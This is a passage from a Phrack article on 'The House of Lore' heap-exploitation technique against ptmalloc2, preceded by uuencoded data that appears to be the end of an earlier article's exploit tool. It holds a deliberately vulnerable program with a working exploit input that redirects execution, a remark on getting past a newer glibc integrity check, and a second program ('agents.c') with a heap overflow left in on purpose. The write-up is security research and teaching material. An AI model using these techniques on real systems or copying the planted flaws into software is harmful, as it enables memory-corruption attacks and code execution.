M=&@N(BP@='EP93TB:6YT(BP@9&5S=#TB=7-E<E]C;VQU;6Y?;&5N9W1H(BD*
M"6=R;W5P+F%D9%]O<'1I;VXH(BTM<VQE97`M869T97(M8V]N;F5C="(L(&%C
M=&EO;CTB<W1O<F5?=')U92(L(&AE;'`](E-L965P(&$@8V]U<&QE(&]F('-E
M8V]N9',@<V\@82!D96)U9V=E<B!C86X@8F4@8V]N;F5C=&5D(BP@9&5F875L
M=#U&86QS92P@9&5S=#TB<VQE97!?869T97)?8V]N;F5C="(I"@EG<F]U<"YA
M9&1?;W!T:6]N*"(M+6EG;F]R92UC86-H92(L(&%C=&EO;CTB<W1O<F5?=')U
M92(L(&AE;'`](DEG;F]R92!T:&4@8V%C:&4@;V8@<W5C8V5S<V9U;"!P<F5V
M:6]U<R!A='1E;7!T<R(L(&1E9F%U;'0]1F%L<V4L(&1E<W0](FEG;F]R95]C
M86-H92(I"@EG<F]U<"YA9&1?;W!T:6]N*"(M+7-E960B+"!A8W1I;VX](G-T
M;W)E(BP@='EP93TB:6YT(BP@:&5L<#TB4V5E9"!T:&4@<F%N9&]M(&YU;6)E
M<B!W:71H('-U<'!L:65D('9A;'5E(BP@9&5F875L=#TP+"!D97-T/2)S965D
M(BD*"@EP87)S97(N861D7V]P=&EO;E]G<F]U<"AG<F]U<"D*"0H);W!T<RP@
M87)G<R`]('!A<G-E<BYP87)S95]A<F=S*&%R9W,I"@H):68H;&5N*&%R9W,I
M(#T](#`I.@H)"7!R:6YT(")0;&5A<V4@<W!E8VEF>2!T:&4@:&]S="!T;R!E
M>'!L;VET(@H)"7-Y<RYE>&ET*#$I"@H):68H;W!T<RYT87)G970@/3T@,"DZ
M"@D)<')I;G0@(E!L96%S92!S<&5C:69Y(&$@=&%R9V5T('1O(&%T=&%C:RXN
M(@H)"61U;7!?=&%R9V5T<R@I"@H):68H;W!T<RYL:7-T7W1A<F=E=',I.@H)
M"61U;7!?=&%R9V5T<R@I"@H):68H;W!T<RYS<VP@86YD(&YO="!S<VQ?879A
M:6QA8FQE*3H*"0EP<FEN="`B+2US<VP@=7-E9"P@8G5T('1H:7,@=F5R<VEO
M;B!O9B!P>71H;VX@9&]E<R!N;W0@:&%V92`G:6UP;W)T('-S;"<@;W!T:6]N
M(@H)"7!R:6YT(")&;W(@=F5R<VEO;G,@;V8@<'ET:&]N(#P@,BXV+"!Y;W4@
M8V%N('5S92!H='1P.B\O<'EP:2YP>71H;VXN;W)G+W!Y<&DO<W-L(@H)"7!R
M:6YT(")T;R!G970@=&AA="!S=7!P;W)T(@H)"7-Y<RYE>&ET*#$I"@H):68H
M;W!T<RYS965D*3H*"0ER86YD;VTN<V5E9"AO<'1S+G-E960I"@D)<')I;G0@
M(ELK72!3965D960@=VET:"`E9"(@)2!O<'1S+G-E960*"@ER971U<FX@;W!T
M<RP@87)G<PH*9&5F(&UA:6XH87)G=6UE;G1S*3H*"@EI9B@B+2UT97-T(B!I
M;B!A<F=U;65N=',I.@H)"6EM<&]R="!D;V-T97-T"@D)9&]C=&5S="YT97-T
M;6]D*"D*"0ER971U<FX*"@EO<'1S+"!A<F=S(#T@<&%R<V5?87)G<RAA<F=U
M;65N=',I"@H):68H;W!T<RYM;V1E(#T](")O9F9S971S(BDZ"@D)<&\@/2!0
M<F]&5%!$7T]F9G-E=',H87)G<ULP72P@;W!T<RD*"0EI9BAO<'1S+G1A<F=E
M="`\(#$@;W(@;W!T<RYT87)G970@/B!L96XH;V9F<V5T7W1A<F=E=',I*3H*
M"0D)9'5M<%]T87)G971S*"D*"0H)"7!O+G)U;BAO9F9S971?=&%R9V5T<UMO
M<'1S+G1A<F=E="TQ72D*"0H)96QI9BAO<'1S+FUO9&4@/3T@(F)R=71E9F]R
M8V4B*3H*"0EP8B`](%!R;T944$1?0G)U=&5F;W)C92AA<F=S6S!=+"!O<'1S
M*0H)"6EF*&]P=',N=&%R9V5T(#P@,2!O<B!O<'1S+G1A<F=E="`^(&QE;BAB
M<G5T969O<F-E7W1A<F=E=',I*3H*"0D)9'5M<%]T87)G971S*"D*"@D)<&(N
M<G5N*&)R=71E9F]R8V5?=&%R9V5T<UMO<'1S+G1A<F=E="TQ72D*"FEF(%]?
K;F%M95]?(#T]("=?7VUA:6Y?7R<Z"@EM86EN*'-Y<RYA<F=V6S$Z72D*"@``
`
end


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x43, Phile #0x08 of 0x10

|=-----------------------------------------------------------------------=|
|=-------------------=[ The House Of Lore: Reloaded ]=-------------------=|
|=-------------=[ ptmalloc v2 & v3: Analysis & Corruption ]=-------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[  by blackngel  ]=-------------------------=|
|=-----------------------------------------------------------------------=|


                  ^^
              *`* @@ *`*     HACK THE WORLD
             *   *--*   *    
                  ##         <blackngel1@gmail.com>
                  ||         <black@set-ezine.org>
                 *  *
                *    *       (C) Copyleft 2010 everybody
               _*    *_


--[ CONTENTS

   1 - Preface

   2 - Introduction

     2.1 - KiddieDbg Ptmalloc2

     2.2 - SmallBin Corruption

         2.2.1 - Triggering The HoL(e)

         2.2.2 - A More Confusing Example

   3 - LargeBin Corruption Method

   4 - Analysis of Ptmalloc3

     4.1 - SmallBin Corruption (Reverse)

     4.2 - LargeBin Method (TreeBin Corruption)

     4.3 - Implement Security Checks

         4.3.1 - Secure Heap Allocator (Utopian)

         4.3.2 - dnmalloc

         4.3.3 - OpenBSD malloc

   5 - Miscellany, ASLR and More

   6 - Conclusions

   7 - Acknowledgments

   8 - References

   9 - Wargame Code

--[ END OF CONTENTS



           .-----------.
---[ 1 ---[   Preface   ]---
           .-----------.

No offense, I could say that sometimes the world of hackers (at least) is 
divided into two camps: 
    
    1.- The illustrious characters who spend many hours to find holes in
    the current software.
    
    2.- And the hackers who spend most of their time to find a way to
    exploit a vulnerable code/environment that does not exist yet.

Maybe, it is a bit confusing but this is like the early question: which 
came first, the chicken or the egg? Or better... Which came first, the bug 
or the exploit?

Unlike what happens with an ordinary Heap Overflow, where we could say it's
the logical progression over time of a Stack Overflow, with The House of 
Lore technique seems to happen something special and strange, we know it's 
there (a thorn in your mind), that something happens, something is wrong 
and that we can exploit it.

But we do not know how to do it. And that is all over this stuff, we know
the technique (at least the Phantasmal Phantasmagoria explanation), but
perhaps has anyone seen a sample vulnerable code that can be exploited?

Maybe someone is thinking: well, if the bug exists and it is an ordinary 
Heap Overflow... 

     1.- What are the conditions to create a new technique? 
     
     2.- Why a special sequence of calls to malloc( ) and free( ) allows a 
     specific exploit technique and why another sequence needs other 
     technique? 
     
     3.- What are the names of those sequences? Are the sequences a bug or 
     is it pure luck?

This can give much food for thought. If Phantasmal had left a clear 
evidence of his theory, surely we would have forgotten about it, but as 
this did not happened, some of us are spending all day analyzing the way to 
create a code that can be committed with a technique that a virtual expert 
gave us in 2005 in a magnificent article that everyone already knows, 
right?

We speak about "Malloc Maleficarum" [1], great theory that I myself had the 
opportunity to demonstrate in practice in the "Malloc Des-Maleficarum" [2] 
article. But unfortunately I left a job unresolved yet. In the pas I was 
not able to interpret so correct one of the techniques that were presented 
by Phantasmal, we speak of course of "The House of Lore" technique, but in
a moment of creativity it seems that I finally found a solution.

Here I submit the details of how a vulnerable code can be attacked with The
House of Lore (THoL from now), thus completing a stage that for some reason
was left unfinished.

In addition, we will target not only the smallbin corruption method which
many have heard of, but we also introduce the complications in largebin 
method and how to solve them. I also present two variants based on these 
techniques that I have found to corrupt the Ptmalloc3 structure.

There are also more content in this paper like a small program where to 
apply one of the techniques can be exploited, it is very useful for an 
exploiting-wargame.

And... yes, THoL was exactly the thorn that I had into my mind.



               << One can resist the invasion
                  of an army but one cannot
                  resist the invasion of ideas. >>

                                   [ Victor Hugo ]



           .----------------.
---[ 2 ---[   Introduction   ]---
           .----------------.

Then, before starting with practical examples, we reintroduce the technical
background of the THoL. While that one might take the Phantasmal's theory
as the only support for subsequent descriptions, we will offer a bigger and
more deep approach to the subject and also some small indications on how 
you can get some information from Ptmalloc2 in runtime without having to 
modify or recompile your personal GlibC.

We mention that dynamic hooks could be a better way to this goal. More
control, more conspicuous.



               << Great spirits have always encountered
                  violent opposition from mediocre minds. >>

                                         [ Albert Einstein ]



             .-----------------------.
---[ 2.1 ---[   KiddieDbg Ptmalloc2   ]---
             .-----------------------.

In an effort to make things easier to the reader when we will perform all
subsequent tests, let's indicate the simple way you can use PTMALLOC2 to
obtain the necessary information from within each attack.

To avoid the tedious task of recompiling GLIBC when one makes a minor 
change in "malloc.c", we decided to directly download the sources of 
ptmalloc2 from: http://www.malloc.de/malloc/ptmalloc2-current.tar.gz.

Then we compiled it in a Kubuntu 9.10 Linux distribution (it will not be a 
great effort to type a make) and you can directly link it as a static 
library to each of our examples like this:

   gcc prog.c libmalloc.a -o prog

However, before compiling this library, we allowed ourselves the luxury of 
introducing a pair of debugging sentences. To achieve this we made use of a
function that is not accessible to everybody, one has to be very eleet to 
know it and only those who have been able to escape to Matrix have the 
right to use it. This lethal weapon is known among the gurus as 
"printf( )".

And now, enough jokes, here are the small changes in "malloc.c" to get some 
information at runtime:


----- snip -----

Void_t*
_int_malloc(mstate av, size_t bytes)
{
....
  checked_request2size(bytes, nb);

  if ((unsigned long)(nb) <= (unsigned long)(av->max_fast)) {
    ...
  }

  if (in_smallbin_range(nb)) {
    idx = smallbin_index(nb);
    bin = bin_at(av,idx);
    if ( (victim = last(bin)) != bin) {

printf("\n[PTMALLOC2] -> (Smallbin code reached)");
printf("\n[PTMALLOC2] -> (victim = [ %p ])", victim);

      if (victim == 0) /* initialization check */
        malloc_consolidate(av);
      else {
        bck = victim->bk;

printf("\n[PTMALLOC2] -> (victim->bk = [ %p ])\n", bck);

        set_inuse_bit_at_offset(victim, nb);
        bin->bk = bck;
        bck->fd = bin;

        if (av != &main_arena)
	  victim->size |= NON_MAIN_ARENA;
        check_malloced_chunk(av, victim, nb);
        return chunk2mem(victim);
      }
    }
  }

----- snip -----


Here we can know when a chunk is extracted from its corresponding bin to
satisfy a memory request of appropriate size. In addition, we can control
the pointer value that takes the "bk" pointer of a chunk if it has been
previously altered.


----- snip -----

  use_top:
    victim = av->top;
    size = chunksize(victim);

    if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
      ........
printf("\n[PTMALLOC2] -> (Chunk from TOP)");
      return chunk2mem(victim);
    }

----- snip -----


Here you simply provide a warning to be aware of when a memory request is
served from the Wilderness chunk (av->top).


----- snip -----

        bck = unsorted_chunks(av);
        fwd = bck->fd;
        p->bk = bck;
        p->fd = fwd;
        bck->fd = p;
        fwd->bk = p;
printf("\n[PTMALLOC2] -> (Freed and unsorted chunk [ %p ])", p);

----- snip -----


Unlike the first two changes which were introduced in the "_int_malloc( )"
function, the latter did it in "_int_free( )" and clearly indicates when a 
chunk has been freed and introduced into the unsorted bin for a further use
of it.



               << I have never met a man so
                  ignorant that I couldn't
                  learn something from him. >>

                           [ Galileo Galilei ]



             .-----------------------.
---[ 2.2 ---[   SmallBin Corruption   ]---
             .-----------------------.

Take again before starting the piece of code that will trigger the 
vulnerability described in this paper:


----- snip ----- 

  if (in_smallbin_range(nb)) {
    idx = smallbin_index(nb);
    bin = bin_at(av,idx);
    if ( (victim = last(bin)) != bin) {

      if (victim == 0) /* initialization check */
        malloc_consolidate(av);
      else {
        bck = victim->bk;
        set_inuse_bit_at_offset(victim, nb);
        bin->bk = bck;
        bck->fd = bin;

        if (av != &main_arena)
	  victim->size |= NON_MAIN_ARENA;
        check_malloced_chunk(av, victim, nb);
        return chunk2mem(victim);
      }

----- snip ----- 


To reach this area of the code inside "_int_malloc( )", one assumes the 
fact that the size of memory request is largest that the current value of 
"av->max_fast" in order to pass the first check and avoid fastbin[ ] 
utilization. Remember that this value is "72" by default.

This done, then comes the function "in_smallbin_range(nb)" which checks in 
turn if the chunk of memory requested is less than that MIN_LARGE_SIZE, 
defined to 512 bytes in malloc.c.

We know from the documentation that: "the size bins for less than 512 bytes
contain always the same size chunks". With this we know that if a chunk of
a certain size has been introduced in its corresponding bin, a further
request of the same size will find the appropriate bin and will return the
previously stored chunk. The functions "smallbin_index(nb)" and 
"bin_at(av, idx)" are responsible for finding the appropriate bin for the
chunk requested.

We also know that a "bin" is a couple of pointers "fd" and "bk", the 
purpose of the pointers is to close the doubly linked list of the free 
chunks. The macro "last(bin)" returns the pointer "bk" of this "fake 
chunk", it also indicates the last available chunk in the bin (if any). If 
none exists, the pointer "bin->bk" would be pointing to itself, then it 
will fail the search and it would be out of the smallbin code.

If there is an available chunk of adequate size, the process is simple. 
Before being returned to the caller, it must be unlinked from the list and,
in order to do it, malloc uses the following instructions:


   1) bck = victim->bk; // bck points to the penultimate chunk

   2) bin->bk = bck;    // bck becomes the last chunk

   3) bck->fd = bin;    // fd pointer of the new last chunk points
                           to the bin to close the list again


If all is correct, the user is given the pointer *mem of victim by the 
macro "chunk2mem(victim)."

The only extra tasks in this process are to set the PREV_INUSE bit of the
contiguous chunk, and also to manage the NON_MAIN_ARENA bit if victim is 
not in the main arena by default.

And here is where the game starts.

The only value that someone can control in this whole process is obviously 
the value of "victim->bk". But to accomplish this, a necessary condition 
must be satisfied:

   1 - That two chunks have been allocated previously, that the latter has
       been freed and that the first will be vulnerable to an overflow.

If this is true, the overflow of the first chunk will allow to manipulate
the header of the already freed second chunk, specifically the "bk" pointer
because other fields are not interesting at this time. Always remember that
the overflow must always occur after the release of this second piece, and
I insist on it because we do not want to blow the alarms within 
"_int_free()" before its time.

As mentioned, if this manipulated second piece is introduced in its 
corresponding bin and a new request of the same size is performed, the 
smallbin code is triggered, and therefore come to the code that interests 
us.

"bck" is pointing to the altered "bk" pointer of victim and as a result, 
will become the last piece in "bin->bk = bck". Then a subsequent call to 
malloc( ) with the same size could deliver a chunk in the position of 
memory with which we had altered the "bk" pointer, and if this were in the 
stack we already know what happens.

In this attack one must be careful with the sentence "bck->fd = bin" since 
this code tries to write to the pointer "fd" the bin's address to close the
linked list, this memory area must have writing permissions.

The only last thing really important for the success of our attack:

When a chunk is freed, it is inserted into the known "unsorted bin". This
is a special bin, also a doubly linked list, with the peculiarity that the
chunks are not sorted (obviously) according to the size. This bin is like a
stack, the chunks are placed in this bin when they are freed and the chunks 
will always been inserted in the first position.

This is done with the intention that a subsequent call to "malloc( ),
calloc( ) or realloc( )" can make use of this chunk if its size can fulfill
the request. This is done to improve efficiency in the memory allocation 
process as each chunk introduced in the unsorted bin has a chance to be 
reused immediately without going through the sorting algorithm.

How does this process work?

All begins within "_int_malloc( )" with the next loop:

   while ( (victim = unsorted_chunks(av)->bk) != unsorted_chunks(av))

then takes the second last piece of the list:

   bck = victim->bk

checks if the memory request is within "in_smallbin_range( )", and it is
checked whether the request could be met with victim. Otherwise, proceed to
remove victim from unsorted bin with:


  unsorted_chunks(av)->bk = bck;
  bck->fd = unsorted_chunks(av);


which is the same as saying: the bin points to the penultimate chunk, and
the penultimate chunk points to the bin which becomes the latest chunk in
the list.

Once removed from the list, two things can happen. Either the size of the
removed chunk matches with the request made (size == nb) in which case it
returns the memory for this chunk to the user, or it does not coincide and 
that's when we proceed to introduce the chunk in the adequate bin with:


   bck = bin_at(av, victim_index);
   fwd = bck->fd;
   .....
   .....
   victim->bk = bck;
   victim->fd = fwd;
   fwd->bk = victim;
   bck->fd = victim;


Why do we mention this? Well, the condition that we mentioned requires that
the freed and manipulated chunk will be introduced in its appropriate bin, 
since as Phantasmal said, altering an unsorted chunk is not interesting at
this time.

With this in mind, our vulnerable program should call malloc( ) between the
vulnerable copy function and the subsequent call to malloc( ) requesting 
the same size as the chunk recently freed. In addition, this intermediate 
call to malloc( ) should request a size larger than the released one, so 
that the request can not be served from unsorted list of chunks and 
proceeds to order the pieces into their respective bins.

We note before completing this section that a bin of a real-life 
application might contain several chunks of the same size stored and 
waiting to be used. When a chunk comes from unsorted bin, that is inserted 
into its appropriate bin as the first in the list, and according to our 
theory, our altered chunk is not being used until it occupies the last 
position (last(bin)). If this occurs, multiple calls to malloc( ) with the 
same size must be triggered so that our chunk reaches the desired position 
in the circular list. At that point, the "bk" pointer must be hacked.

Graphically would pass through these stages:

Stage 1: Insert victim into smallbin[ ].


                   bin->bk  ___  bin->fwd
                  o--------[bin]----------o
                  !         ^ ^           !
               [last]-------| |-------[victim]
                 ^|   l->fwd    v->bk    ^|
                 |!                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |
                     |________________|    


Stage 2: "n" calls to malloc( ) with same size.


                   bin->bk  ___  bin->fwd
                  o--------[bin]----------o
                  !         ^ ^           !
              [victim]------| |--------[first]
                 ^|   v->fwd    f->bk    ^|
                 |!                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |
                     |________________|    


Stage 3: Overwrite "bk" pointer of victim.


                   bin->bk  ___  bin->fwd
                  o--------[bin]----------o
 & stack          !         ^ ^           !
     ^--------[victim]------| |--------[first]
        v->bk     ^   v->fwd    f->bk    ^|
                  |                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |
                     |________________|  


Stage 4: Last call to malloc( ) with same size.


                   bin->bk  ___  bin->fwd
                  o--------[bin]----------o
 & -w- perm       !         ^ ^           !
     ^--------[&stack]------| |--------[first]
        v->bk     ^   v->fwd    f->bk    ^|
                  |                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |
                     |________________|  


It is where the pointer "*mem" is returned pointing to the stack and thus 
giving full control of the attacked system. However as there are people who
need to see to believe, read on next section.

Note: I have not checked all versions of glibc, and some changes have been
made since I wrote this paper. For example, on an Ubuntu box (with glibc
2.11.1) we see the next fix:


----- snip -----

        bck = victim->bk;
        if (__builtin_expect (bck->fd != victim, 0))
          {
            errstr = "malloc(): smallbin double linked list corrupted";
            goto errout;
          }
        set_inuse_bit_at_offset(victim, nb);
        bin->bk = bck;
        bck->fd = bin;

----- snip -----


This check can still be overcome if you control an area into the stack and
you can write an integer such that its value is equal to the address of the
recently free chunk (victim). This must happen before the next call to
malloc( ) with the same size requested.



               << The grand aim of all science is to cover
                  the greatest number of empirical facts
                  by logical deduction from the smallest
                  number of hypotheses or axioms. >>

                                       [ Albert Einstein ]



               .-------------------------.
---[ 2.2.1 ---[   Triggering The HoL(e)   ]---
               .-------------------------.

After the theory... A practical example to apply this technique, here is a 
detailed description:


---[ thl.c ]---

#include <stdio.h>
#include <string.h>

void evil_func(void)
{
    printf("\nThis is an evil function. You become a cool \
hacker if you are able to execute it.\n"); 
}

void func1(void)
{
    char *lb1, *lb2;
     
    lb1 = (char *) malloc(128);
    printf("LB1 -> [ %p ]", lb1);
    lb2 = (char *) malloc(128);
    printf("\nLB2 -> [ %p ]", lb2);

    strcpy(lb1, "Which is your favourite hobby? ");
    printf("\n%s", lb1);
    fgets(lb2, 128, stdin);
}

int main(int argc, char *argv[])
{
    char *buff1, *buff2, *buff3;

    malloc(4056);
    buff1 = (char *) malloc(16);
    printf("\nBuff1 -> [ %p ]", buff1);
    buff2 = (char *) malloc(128);
    printf("\nBuff2 -> [ %p ]", buff2);
    buff3 = (char *) malloc(256);
    printf("\nBuff3 -> [ %p ]\n", buff3);

    free(buff2);

    printf("\nBuff4 -> [ %p ]\n", malloc(1423));

    strcpy(buff1, argv[1]);

    func1();

    return 0;
}

---[ end thl.c ]---


The program is very simple, we have a buffer overflow in "buff1" and an
"evil_func( )" function which is never called but which we want to run.

In short we have everything we need in order to trigger THoL:

1) Make a first call to malloc(4056), it shouldn't be necessary but we use 
   to warm up the system. Furthermore, in a real-life application the heap 
   probably won't be starting from scratch.

2) We allocate three chunks of memory, 16, 128 and 256 bytes respectively,
   since no chunks has been released before, we know that they must been 
   taken from the Wilderness or Top Chunk.

3) Free() the second chunk of 128 bytes. This is placed in the unsorted 
   bin.

4) Allocate a fourth piece larger than the most recently freed chunk. The
   "buff2" is now extracted from the unsorted list and added to its 
   appropriate bin.

5) We have a vulnerable function strcpy( ) that can overwrite the header
   of the chunk previously passed to free( ) (including its "bk" field).

6) We call func1( ) which allocated two blocks of 128 bytes (the same size
   as the piece previously released) to formulate a question and get a user
   response.

It seems that in point 6 there is nothing vulnerable, but everyone knows
that if "LB2" point to the stack, then we may overwrite a saved return
address. That is our goal, and we will see this approach.

A basic execution could be like this:

black@odisea:~/ptmalloc2$ ./thl AAAA

[PTMALLOC2] -> (Chunk from TOP)
Buff1 -> [ 0x804ffe8 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff2 -> [ 0x8050000 ]
[PTMALLOC2] -> (Chunk from TOP)
Buff3 -> [ 0x8050088 ]

[PTMALLOC2] -> (Freed and unsorted chunk [ 0x804fff8 ])
[PTMALLOC2] -> (Chunk from TOP)
Buff4 -> [ 0x8050190 ]

[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0x804fff8 ])
[PTMALLOC2] -> (victim->bk = [ 0x804e188 ])
LB1 -> [ 0x8050000 ]
[PTMALLOC2] -> (Chunk from TOP)
LB2 -> [ 0x8050728 ]
Which is your favourite hobby: hack
black@odisea:~/ptmalloc2$


We can see that the first 3 malloced chunks are taken from the TOP, then 
the second chunk (0x0804fff8) is passed to free() and placed in the 
unsorted bin. This piece will remain here until the next call to malloc( ) 
will indicate whether it can meet the demand or not.

Since the allocated fourth buffer is larger than the recently freed, it's 
taken again from TOP, and buff2 is extracted from unsorted bin to insert it
into the bin corresponding to its size (128).

After we see how the next call to malloc(128) (lb1) triggers smallbin code 
returning the same address that the buffer previously freed. You can see 
the value of "victim->bk" which is what should take (lb2) after this 
address had been passed to the chunk2mem( ) macro.

However, we can see in the output: the lb2 is taken from the TOP and not
from a smallbin. Why? Simple, we've just released a chunk (only had a piece
in the corresponding bin to the size of this piece) and since we have not 
altered the "bk" pointer of the piece released, the next check:


   if ( (victim = last(bin)) != bin)

which is the same as:

   if ( (victim = (bin->bk = oldvictim->bk)) != bin)

will say that the last piece in the bin points to the bin itself, and
therefore, the allocation must be extracted from another place.

Until here all right, then, what do we need to exploit the program?

1) Overwrite buff2->bk with an address on the stack near a saved return 
   address (inside the frame created by func1( )).

2) This address, in turn, must fall on a site such that the "bk" pointer of
   this fake chunk will be an address with write permissions.

3) The evil_func()'s address with which we want to overwrite EIP and the 
   necessary padding to achieve the return address.

Let's start with the basics:

If we set a breakpoint in func1( ) and examine memory, we get:


(gdb) x/16x $ebp-32
0xbffff338:     0x00000000      0x00000000      0xbffff388      0x00743fc0
0xbffff348:     0x00251340      0x00182a20      0x00000000      0x00000000
0xbffff358:     0xbffff388      0x08048d1e      0x0804ffe8      0xbffff5d7
0xbffff368:     0x0804c0b0      0xbffff388      0x0013f345      0x08050088

EBP -> 0xbffff358
RET -> 0xbffff35C


But the important thing here is that we must alter buff2->bk with the
"0xbffff33c" value so the new victim->bk take a writable address.

Items 1 and 2 passed. The evil_func()'s address is:


(gdb) disass evil_func
Dump of assembler code for function evil_func:
0x08048ba4 <evil_func+0>:       push   %ebp  


And now, without further delay, let's see what happens when we merge all
these elements into a single attack:


black@odisea:~/ptmalloc2$ perl -e 'print "BBBBBBBB". "\xa4\x8b\x04\x08"' >
evil.in

...

(gdb) run `perl -e 'print "A"x28 . "\x3c\xf3\xff\xbf"'` < evil.in                                                                            

[PTMALLOC2] -> (Chunk from TOP)
Buff1 -> [ 0x804ffe8 ] 
[PTMALLOC2] -> (Chunk from TOP)
Buff2 -> [ 0x8050000 ] 
[PTMALLOC2] -> (Chunk from TOP)
Buff3 -> [ 0x8050088 ]         

[PTMALLOC2] -> (Freed and unsorted chunk [ 0x804fff8 ])
[PTMALLOC2] -> (Chunk from TOP)                                                
Buff4 -> [ 0x8050190 ]

[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0x804fff8 ])
[PTMALLOC2] -> (victim->bk = [ 0xbffff33c ]) // First stage of attack
LB1 -> [ 0x8050000 ]
[PTMALLOC2] -> (Smallbin code reached)
[PTMALLOC2] -> (victim = [ 0xbffff33c ])     // Victim in the stack
[PTMALLOC2] -> (victim->bk = [ 0xbffff378 ]) // Address with write perms

LB2 -> [ 0xbffff344 ]                        // Boom!
Which is your favourite hobby?

This is an evil function. You become a cool hacker if you are able to
execute it.                                  // We get a cool msg.

Program received signal SIGSEGV, Segmentation fault.
0x08048bb7 in evil_func ()
(gdb)


You must be starting to understand now what I wanted to explain in the 
preface of this article, instead of discovering or inventing a new 
technique, what we have been doing for a long time is to find the way to 
design a vulnerable application to this technique which had fallen us from 
the sky a few years ago.

Compile this example with normal GLIBC and you will get the same result, 
only remember adjusting evil_func( ) address or the area where you have
stored your custom arbitrary code.



               << The unexamined life is not worth living. >>

                                                 [ Socrates ]



               .----------------------------.
---[ 2.2.2 ---[   A More Confusing Example   ]---
               .----------------------------.

To understand how THoL could be applied in a real-life application, I 
present below a source code created by me as if it were a game, that will
offer a broader view of the attack.

This is a crude imitation of an agent manager. The only thing this program
can do is creating a new agent, editing it (ie edit their names and 
descriptions) or deleting it. To save space, one could edit only certain 
fields of an agent, leaving the other free without taking up memory or 
freeing when no longer needed.

In addition, to avoid unnecessary extensions in this paper, the entire
information entered into the program is not saved in any database and only
remains available while the application is in execution.


---[ agents.c ]---

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void main_menu(void);

void create_agent(void);
void select_agent(void);
void edit_agent(void);
void delete_agent(void);

void edit_name(void);
void edit_lastname(void);
void edit_desc(void);
void delete_name(void);
void delete_lastname(void);
void delete_desc(void);
void show_data_agent(void);

typedef struct agent {
   int id;
   char *name;
   char *lastname;
   char *desc;
} agent_t;

agent_t *agents[256];
int agent_count = 0;
int sel_ag = 0;

int main(int argc, char *argv[])
{
      main_menu();
}

void main_menu(void)
{
   int op = 0;
   char opt[2];

   printf("\n\t\t\t\t[1] Create new agent");
   printf("\n\t\t\t\t[2] Select Agent");
   printf("\n\t\t\t\t[3] Show Data Agent");
   printf("\n\t\t\t\t[4] Edit agent");
   printf("\n\t\t\t\t[0] <- EXIT");
   printf("\n\t\t\t\tSelect your option:");
   fgets(opt, 3, stdin);

   op = atoi(opt);
   
   switch (op) {
	case 1:
		create_agent();
		break;
	case 2:
		select_agent();
		break;
	case 3:
		show_data_agent();
		break;
	case 4:
		edit_agent();
		break;
	case 0:
           	 exit(0);
    	default:
	  	break;
   }     

   main_menu();
}

void create_agent(void)
{
   agents[agent_count] = (agent_t *) malloc(sizeof(agent_t));
   sel_ag = agent_count;
   agents[agent_count]->id = agent_count;
   agents[agent_count]->name = NULL;
   agents[agent_count]->lastname = NULL;
   agents[agent_count]->desc = NULL;
   printf("\nAgent %d created, now you can edit it", sel_ag);
   agent_count += 1;
}

void select_agent(void)
{
   char ag_num[2];
   int num;
  
   printf("\nWrite agent number: ");
   fgets(ag_num, 3, stdin);
   num = atoi(ag_num);

   if ( num >= agent_count ) {
       printf("\nOnly %d available agents, select another", agent_count);
   } else {
       sel_ag = num;
       printf("\n[+] Agent %d selected.", sel_ag);
   }
}

void show_data_agent(void)
{
   printf("\nAgent [%d]", agents[sel_ag]->id);

   printf("\nName: "); 
   if(agents[sel_ag]->name != NULL)
       printf("%s", agents[sel_ag]->name);

   printf("\nLastname: ");  
   if(agents[sel_ag]->lastname != NULL)
       printf("%s", agents[sel_ag]->lastname);
   
   printf("\nDescription: ");
   if(agents[sel_ag]->desc != NULL)
       printf("%s", agents[sel_ag]->desc);
}

void edit_agent(void)
{
   int op = 0;
   char opt[2];

   printf("\n\t\t\t\t[1] Edit name");
   printf("\n\t\t\t\t[2] Edit lastname");
   printf("\n\t\t\t\t[3] Edit description");
   printf("\n\t\t\t\t[4] Delete name");
   printf("\n\t\t\t\t[5] Delete lastname");
   printf("\n\t\t\t\t[6] Delete description");
   printf("\n\t\t\t\t[7] Delete agent");
   printf("\n\t\t\t\t[0] <- MAIN MENU");
   printf("\n\t\t\t\tSelect Agent Option: ");
   fgets(opt, 3, stdin);

   op = atoi(opt);

   switch (op) {
      case 1:
           edit_name();
	   break;
      case 2:
           edit_lastname();
           break;
      case 3:
           edit_desc();
           break;
      case 4:
           delete_name();
   	   break;
      case 5:
           delete_lastname();
           break;
      case 6:
           delete_desc();
           break;
      case 7:
           delete_agent();
           break;
      case 0:
           main_menu();
      default:
         break;
   }
  
   edit_agent();
}

void edit_name(void)
{
   if(agents[sel_ag]->name == NULL) {
      agents[sel_ag]->name = (char *) malloc(32);
      printf("\n[!!!]malloc(ed) name [ %p ]", agents[sel_ag]->name);
   }

   printf("\nWrite name for this agent: ");
   fgets(agents[sel_ag]->name, 322, stdin);
}

void delete_name(void)
{
   if(agents[sel_ag]->name != NULL) {
      free(agents[sel_ag]->name);
      agents[sel_ag]->name = NULL;
   }
}

void edit_lastname(void)
{
   if(agents[sel_ag]->lastname == NULL) {
      agents[sel_ag]->lastname = (char *) malloc(128);
      printf("\n[!!!]malloc(ed) lastname [ %p ]",agents[sel_ag]->lastname);
   }
   
   printf("\nWrite lastname for this agent: ");
   fgets(agents[sel_ag]->lastname, 127, stdin);
}

void delete_lastname(void)
{
   if(agents[sel_ag]->lastname != NULL) {
      free(agents[sel_ag]->lastname);
      agents[sel_ag]->lastname = NULL;
   }
}

void edit_desc(void)
{
   if(agents[sel_ag]->desc == NULL) {
      agents[sel_ag]->desc = (char *) malloc(256);
      printf("\n[!!!]malloc(ed) desc [ %p ]", agents[sel_ag]->desc);
   }

   printf("\nWrite description for this agent: ");
   fgets(agents[sel_ag]->desc, 255, stdin);
}

void delete_desc(void)
{
   if(agents[sel_ag]->desc != NULL) {
      free(agents[sel_ag]->desc);
      agents[sel_ag]->desc = NULL;
   }
}

void delete_agent(void)
{
